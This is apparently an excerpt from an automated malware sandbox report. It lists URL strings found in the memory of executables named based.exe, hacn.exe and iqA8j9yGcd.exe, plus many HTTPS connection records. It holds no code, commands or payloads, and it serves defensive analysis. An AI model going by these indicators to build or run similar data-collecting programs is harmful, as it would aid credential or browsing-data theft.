Source: based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799246935.000001F16CCE4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: based.exe, 00000008.00000003.2143028640.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.r
Source: based.exe, 00000008.00000003.2114168132.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: based.exe, 00000008.00000002.2801754901.000001F16D7BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: based.exe, 00000008.00000003.2164958998.000001F16D375000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802327284.000001F16DF98000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D375000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D8E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181624099.000001F16D5D3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2129617566.000001F16D5D3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D30A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2129617566.000001F16D5D3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D30A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: based.exe, 00000008.00000003.2176280987.000001F16D385000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D385000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2149446805.000001F16D385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152336872.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123018744.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: based.exe, 00000008.00000003.2153958230.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178559256.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181849798.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152605175.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: based.exe, 00000008.00000003.2182207601.000001F16D354000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2153958230.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2149446805.000001F16D355000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178559256.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176280987.000001F16D355000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123362876.000001F16D355000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181849798.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152605175.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D355000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16D08E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: based.exe, 00000008.00000003.2269393570.000001F16D355000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icx
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: based.exe, 00000008.00000002.2802048410.000001F16D9CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: based.exe, 00000007.00000003.2051504122.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2805322624.00007FF8A87A7000.00000004.00000001.01000000.0000001E.sdmp, based.exe, 00000008.00000002.2814671813.00007FF8A9398000.00000004.00000001.01000000.0000001F.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: hacn.exe, 00000006.00000003.2039819790.00000246D4005000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: iqA8j9yGcd.exe, 00000002.00000003.2020422782.0000021B8E148000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020576410.0000021B8E148000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020520480.0000021B8E135000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020461459.0000021B8E135000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2058606522.000001F16CD45000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2069100436.000002471C4C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: based.exe, based.exe, 00000008.00000002.2805857266.00007FF8A8D68000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D2CF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: based.exe, 00000008.00000002.2801754901.000001F16D7BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: based.exe, 00000008.00000002.2801268100.000001F16D4EE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D55E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 56207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56200
Source: unknown	Network traffic detected: HTTP traffic on port 56239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56202
Source: unknown	Network traffic detected: HTTP traffic on port 56197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56212
Source: unknown	Network traffic detected: HTTP traffic on port 56219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56217
Source: unknown	Network traffic detected: HTTP traffic on port 56247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56213
Source: unknown	Network traffic detected: HTTP traffic on port 56192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56223
Source: unknown	Network traffic detected: HTTP traffic on port 56244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56226
Source: unknown	Network traffic detected: HTTP traffic on port 56195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56231
Source: unknown	Network traffic detected: HTTP traffic on port 56241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56197
Source: unknown	Network traffic detected: HTTP traffic on port 56272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56192
Source: unknown	Network traffic detected: HTTP traffic on port 56224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56193
Source: unknown	Network traffic detected: HTTP traffic on port 56203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56239
Source: unknown	Network traffic detected: HTTP traffic on port 56198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56240
Source: unknown	Network traffic detected: HTTP traffic on port 56261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56241
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56247
Source: unknown	Network traffic detected: HTTP traffic on port 56193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56250
Source: unknown	Network traffic detected: HTTP traffic on port 56243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56251
Source: unknown	Network traffic detected: HTTP traffic on port 56264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56252
Source: unknown	Network traffic detected: HTTP traffic on port 56270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56211 -> 443
